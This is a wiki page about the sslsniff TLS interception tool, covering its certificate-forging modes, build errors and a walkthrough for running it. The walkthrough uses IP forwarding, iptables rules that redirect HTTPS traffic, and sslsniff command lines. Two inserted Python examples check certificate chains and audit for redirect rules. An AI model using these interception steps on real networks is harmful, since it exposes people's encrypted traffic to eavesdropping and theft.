From charlesreid1

A tool from Moxie Marlinspike.

Also see SSLStrip.

Github repo: https://github.com/moxie0/sslsniff

Overview

sslsniff is slightly different from sslstrip. The intention of sslstrip is to turn HTTPS requests into HTTP requests, thereby forcing the victim (the "sheep") over an insecure, unencrypted connection. sslsniff, by contrast, is a tool that focuses on certificates: the connection stays encrypted, but the attacker terminates it and presents a certificate of their own to the client.

sslsniff has two modes: authority mode, and targeted mode. In addition, it implements several attacks on Firefox auto-updates.

In authority mode, sslsniff acts as a certificate authority, using a custom CA certificate (or a self-signed, auto-generated one) to sign certificates for whatever sites the client requests. This won't get you very far on its own, since a self-signed certificate won't be trusted by the client. A forged certificate, or a root certificate that you can use to sign other certificates, is required to pull off an attack on HTTPS. sslsniff authority mode is also useful against clients that implement BasicConstraints checking improperly: such a client accepts an ordinary leaf certificate in place of a CA certificate, so a leaf certificate can stand in as the issuer of whatever certificate sslsniff presents.
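The check a client must perform to be immune to the BasicConstraints problem just described, as an added example (not code from this page or from sslsniff): certificates are modelled as a small hypothetical `Cert` record rather than parsed from DER, signature checking is assumed to happen elsewhere, and `verify_chain` refuses to treat any certificate as an issuer unless it carries CA:TRUE and its pathLenConstraint permits the remaining depth. Sample certificates are constructed for the demo.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Cert:
    """Hypothetical stand-in for an X.509 certificate; no real DER parsing."""
    subject: str
    issuer: str
    is_ca: bool                     # BasicConstraints cA flag
    path_len: Optional[int] = None  # BasicConstraints pathLenConstraint; None = unlimited


def verify_chain(leaf: Cert, chain: List[Cert], roots: Dict[str, Cert],
                 enforce_basic_constraints: bool = True) -> bool:
    """Walk from `leaf` to a trusted root (`roots` is keyed by subject name).

    Signatures are assumed to be checked elsewhere; only issuer selection is
    modelled. With enforce_basic_constraints=False this behaves like the broken
    validators described above: any certificate whose subject matches the issuer
    name is accepted as a signer, even an ordinary leaf certificate.
    """
    by_subject = {c.subject: c for c in chain}
    current = leaf
    intermediates_below = 0  # sub-CAs already passed between this issuer and the leaf
    for _ in range(len(chain) + 1):
        issuer = roots.get(current.issuer) or by_subject.get(current.issuer)
        if issuer is None:
            return False
        if enforce_basic_constraints:
            if not issuer.is_ca:  # a leaf certificate may never act as an issuer
                return False
            if issuer.path_len is not None and issuer.path_len < intermediates_below:
                return False  # chain is deeper than the CA's pathLenConstraint allows
        if issuer.subject in roots:
            return True
        current = issuer
        intermediates_below += 1
    return False


# Constructed sample data: a root, a legitimate site certificate, and a
# certificate "issued" by that site certificate, which a BasicConstraints-blind
# client would accept.
ROOT = Cert("Example Root CA", "Example Root CA", is_ca=True)
SITE = Cert("www.example.com", "Example Root CA", is_ca=False)
LEAF_SIGNED = Cert("bank.example", "www.example.com", is_ca=False)
ROOTS = {ROOT.subject: ROOT}

if __name__ == "__main__":
    print("legitimate site:", verify_chain(SITE, [], ROOTS))                      # True
    print("leaf used as CA (strict):", verify_chain(LEAF_SIGNED, [SITE], ROOTS))  # False
    print("leaf used as CA (lax):", verify_chain(LEAF_SIGNED, [SITE], ROOTS, enforce_basic_constraints=False))  # True
```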

In targeted mode, sslsniff uses particular certificates for particular domains or sets of domains. This is intended for use when you have certificates that will only work for certain domains.

By taking over the Firefox auto-update process, you can install arbitrary binary blobs into the browser: keyloggers, certificate bundles, and so on.

In Plain English

There is not an off-the-shelf attack to just automatically strip out SSL - modern sites and modern browsers are hip to that jive. You'll need to obtain a trusted certificate, or you'll have to make your own and install it in the client's browser's list of trusted certificates. This tool leads to the wonderful and wide world of certificates, certificate authorities, and the many ways of tricking browsers into trusting and accepting your certificates.

Real World Application

As a common example of how this happens (legitimately) in everyday life, hop onto any web browser in a public library, or at your workplace, or at a university. Open the list of trusted certificates in the browser. You are almost guaranteed to find one that is issued and signed by the institution itself, and not by a certificate authority. That allows these institutions to strip out the SSL and decrypt all of your HTTPS traffic, examine it to make sure you aren't looking at naughty things or sending emails with nuclear secrets, and then bundle the traffic back up and ship it on out to the other end.

The fact that the certificate is trusted by your browser means neither end of the "encrypted" conversation will complain when the institution (or anyone else holding that certificate's key) decrypts, inspects, and re-encrypts the traffic, because that certificate lets it masquerade as the server to you, and then as you to the server.

Carrying Out SSL Sniff Attacks in Practice

These two MITM (man in the middle) labs cover how to sniff encrypted traffic and decrypt it offline using Wireshark or SSLSniff by using either the .pem private key file, or the SSL key information dumped to a file:

Building

From Aptitude

On Kali:

apt-get install sslsniff

From Source

TLDR: Use my fork: http://github.com/charlesreid1/sslsniff

ooookay, first you need autotools, and boost, and log4cpp:

apt-get install autotools-dev libboost1.61-dev libboost-filesystem-dev libboost-thread-dev liblog4cpp5-dev

then you need these commands to make a configure file:

aclocal
autoconf
automake --add-missing

then you need to run the usual configure+make:

./configure
make

If you run make install, it will install it over the system sslsniff. For me, that came from the Kali apt repositories, and that program crashed, which is why I had to work out the song and dance to get sslsniff to compile. Additionally, there are some really, really stale (5+ year old) issues on the sslsniff repo on Github, so this tool has been dead for a looooong time.

Errors

libcrypto:

On compile I was seeing some missing symbol errors about openssl stuff:

$ make

g++ -ggdb -g -O2 -o sslsniff -lssl -lboost_filesystem -lpthread -lboost_thread -llog4cpp \
SSLConnectionManager.o Destination.o FirefoxUpdater.o Logger.o SessionCache.o SSLBridge.o HTTPSBridge.o sslsniff.o FingerprintManager.o AuthorityCertificateManager.o \
TargetedCertificateManager.o CertificateManager.o HttpBridge.o HttpConnectionManager.o HttpHeaders.o UpdateManager.o OCSPDenier.o FirefoxAddonUpdater.o
/usr/bin/ld: AuthorityCertificateManager.o: undefined reference to symbol 'X509_gmtime_adj@@OPENSSL_1.0.2d'
//usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.2: error adding symbols: DSO missing from command line
collect2: error: ld returned 1 exit status
Makefile:388: recipe for target 'sslsniff' failed
make: *** [sslsniff] Error 1

I checked this library file (.so) to see if that symbol was, in fact, defined, and it was:

$ readelf -Ws /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.2 | grep gmtime
    31: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND gmtime_r@GLIBC_2.2.5 (5)
    93: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND gmtime@GLIBC_2.2.5 (5)
   179: 000000000016acb0     7 FUNC    GLOBAL DEFAULT   13 X509_gmtime_adj@@OPENSSL_1.0.2d

So what gives?

I tried re-ordering the library flags, and got this:

$ g++ -ggdb -g -O2  -o sslsniff -lboost_filesystem -lpthread -lboost_thread -llog4cpp -lssl  \
SSLConnectionManager.o Destination.o FirefoxUpdater.o Logger.o SessionCache.o SSLBridge.o HTTPSBridge.o sslsniff.o FingerprintManager.o AuthorityCertificateManager.o \
TargetedCertificateManager.o CertificateManager.o HttpBridge.o HttpConnectionManager.o HttpHeaders.o UpdateManager.o OCSPDenier.o FirefoxAddonUpdater.o
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libboost_filesystem.so: undefined reference to symbol '_ZN5boost6system15system_categoryEv'
//usr/lib/x86_64-linux-gnu/libboost_system.so.1.61.0: error adding symbols: DSO missing from command line
collect2: error: ld returned 1 exit status

but again, I checked the library file and saw that that symbol is, in fact, defined:

$ readelf -Ws /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libboost_filesystem.so | grep ZN5boost6system15system
    47: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZN5boost6system15system_categoryEv

Getting Help

Get some help:

sslsniff -h

Important Flags

Important flags:

  • -a/-t - authority vs targeted mode

Required options:

  • -c - file containing CA certificate or key (authority mode), or a directory with a collection of certificates (targeted mode)
  • -s port - port to listen on for ssl interception
  • -w file - file to log output to

Running

Prepare Firewall

A note on ports

sslsniff will use a minimum of one port, and potentially two.

One port is dedicated to SSL sniffing. This is the port to which all HTTPS traffic is redirected (for example, port 6666). It is set with the -s flag.

A second port is dedicated to HTTP sniffing, used for OS fingerprinting. This must be a different port (for example, port 6667). It is set with the -h flag.

Running with MITM

Tell your machine to forward packets:

echo 1 > /proc/sys/net/ipv4/ip_forward

Flush rules from iptables:

$ iptables -F

Add a rule to intercept HTTPS traffic:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports <$listenPort>

If you're going to do client fingerprinting, add a rule to intercept HTTP traffic:

$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports <$httpListenPort>
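The flip side of the redirect rules above, as an added example that is not part of the original page: a small audit that reads `iptables -t nat -S` output and flags any PREROUTING rule that redirects port 443 or 80 to a local port, which is the footprint this setup leaves on the intercepting host. The rule listing below is constructed for the example; the function name `find_tls_redirects` is mine.

```python
import shlex
from typing import Dict, List

# Constructed sample of `iptables -t nat -S` output; on a real host substitute
# the actual command output. Lines 2 and 3 are the redirects shown on this page.
SAMPLE_NAT_RULES = """\
-P PREROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 6666
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 6667
-A PREROUTING -p udp -m udp --dport 53 -j REDIRECT --to-ports 5353
-A POSTROUTING -o eth0 -j MASQUERADE
"""

WATCHED_PORTS = {"443": "https", "80": "http"}  # the ports sslsniff hijacks


def _option(tokens: List[str], *names: str) -> str:
    """Return the value following the first of `names` present, else ''."""
    for i, tok in enumerate(tokens[:-1]):
        if tok in names:
            return tokens[i + 1]
    return ""


def find_tls_redirects(rules: str) -> List[Dict[str, str]]:
    """Flag PREROUTING rules that REDIRECT or DNAT HTTP(S) traffic elsewhere."""
    findings = []
    for line in rules.splitlines():
        tokens = shlex.split(line)
        if len(tokens) < 2 or tokens[0] != "-A" or tokens[1] != "PREROUTING":
            continue
        if _option(tokens, "-j") not in ("REDIRECT", "DNAT"):
            continue
        # iptables -S prints --dport; the rules on this page use --destination-port
        dport = _option(tokens, "--dport", "--destination-port")
        if dport not in WATCHED_PORTS:
            continue
        findings.append({
            "service": WATCHED_PORTS[dport],
            "dport": dport,
            "to": _option(tokens, "--to-ports", "--to-destination"),
            "rule": line,
        })
    return findings


if __name__ == "__main__":
    for f in find_tls_redirects(SAMPLE_NAT_RULES):
        print(f"{f['service']}: port {f['dport']} redirected to {f['to']}  [{f['rule']}]")
```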

Running in Authority Mode

To run in authority mode:

sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>

Running In Targeted Mode

To run sslsniff in targeted mode, pass the -t flag and tell it where to find the directory of certificates with -c. The null-prefix certificates in the certs directory ship with sslsniff; to use those, add the flag -m IPSCACLASEA1.crt. No targeted certificates ship with sslsniff, but there is a universal wildcard certificate example.

$ sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt -c <$certDir>

See the note on the listen port above; I set it to 6666. You can also add the -h flag to intercept HTTP traffic for OS fingerprinting:

$ sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt -c <$certDir> -h <$httpListenPort>

Failure

sslsniff is failing in targeted mode with segmentation faults. It can't deal with certificate files, logging, and listening all at the same time, apparently. I don't know why.

Example Certs

Wildcard cert: https://github.com/moxie0/sslsniff/blob/master/certs/wildcard

Links

http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding-Man-in-the-Middle-Attacks-ARP-Part4.html

http://cyborg.ztrela.com/sslsniff.php/
